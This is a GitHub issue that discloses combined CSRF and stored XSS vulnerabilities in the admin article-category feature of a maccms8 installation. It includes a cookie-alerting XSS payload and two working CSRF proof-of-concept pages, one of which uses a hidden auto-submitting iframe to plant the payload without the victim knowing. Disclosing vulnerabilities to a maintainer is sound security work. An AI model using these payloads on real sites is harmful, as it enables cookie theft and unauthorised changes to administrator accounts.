Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies #2

Closed
Trepverterless opened this issue Oct 28, 2019 · 1 comment

Comments

@Trepverterless
Copy link

Trepverterless commented Oct 28, 2019

xss

XSS vulnerability exists in the background administrator article management office when adding and modifying
Where Chinese and English names are entered, enter
" onmousemove=alert(document.cookie) src=x,Following chart
1
Move the mouse over the label in the background article management area and the administrator cookie will pop up, as shown in the following figure
2
User cookies will also pop up when the front page mouse moves over the title
3


csrf

It is found that CSRF exists at the same time of adding and modifying
Before use
4
When the following page is constructed, the administrator can be induced to click

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When the administrator visits the click Page
image

Category added successfully
image


csrf+xss

Here, CSRF and XSS can be used together, and attackers can use CSRF vulnerability to add or fix code brought in by articles,

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Welcome to CSRF</title>
</head>
<p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p>
<body>
<iframe hidden width=1000 heigth=100 src="#" srcdoc='
<form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form">
      <input type="hidden" name="t&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" />
      <input type="hidden" name="t&#95;pid" value="0" />
      <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" />
      <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" />
      <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" />
      <input type="hidden" name="t&#95;key" value="" />
      <input type="hidden" name="t&#95;des" value="" />
      <input type="hidden" name="t&#95;title" value="" />
      <input type="hidden" name="t&#95;sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
<script>
//Automatic submission
document.form.submit();
</script>
'></iframe>
</body>
</html>

After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie.
image

@magicblack
Copy link
Owner

good!

@Trepverterless Trepverterless changed the title 后台存在csrf和XSS漏洞,可以结合两个漏洞,盗取用户cookie和管理员cookie There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies Dec 2, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants